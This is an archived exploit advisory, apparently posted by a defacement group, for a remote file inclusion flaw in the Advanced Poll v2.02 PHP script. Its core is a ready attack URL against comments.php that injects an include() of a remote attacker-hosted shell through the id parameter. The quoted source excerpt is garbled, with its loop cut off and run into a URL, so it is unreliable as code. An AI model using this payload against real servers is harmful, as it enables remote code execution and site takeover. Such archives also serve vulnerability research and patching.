TUCoPS :: HP Unsorted A :: b06-5112.htm

TUCoPS :: HP Unsorted A :: b06-5112.htm
Advanced Poll v2.02 :) <= Remote File Inclusion

Advanced Poll v2.02 :) <= Remote File Inclusion Advanced Poll v2.02 :) <= Remote File Inclusion


+--------------------------------------------------------------------
+
+ Advanced Poll v2.02 :)  <= Remote File Inclusion
+
+--------------------------------------------------------------------
+
+ Affected Software .: Advanced Poll v2.02
+ Venedor ...........: http://www.proxy2.de 
+ Class .............: Remote File Inclusion
+ Risk ..............: high (Remote File Execution)
+ Found by ..........: Pro Hacker
+ Original advisory .: http://www.sec-area.com/ http://www.worlddefacers.de/ 
+ Contact ...........: alguidy[at]hotmail[.]com
+
+--------------------------------------------------------------------
+
+ Code comments.php:
+
+ .....
+ $register_poll_vars = array("id","template_set","action");
+ for ($i=0;$ihttp://sec-area.com/sh.txt? 
+
+
+ http://[target]/poll/comments.php?id={${include($ddd)}}{${exit()}}&ddd=Http://EvilShell 
+
+--------------------------------------------------------------------
+ [W]orld [D]efacers [T]eam
+ Greets:
+ || rUnViRuS || - || papipsycho || - || HeX || - || Linux Master || BLaCKWHITE
||
+ || P-r-O H-a-C-k-E-r-S ||
+
+-------------------------[ W D T ]----------------------------------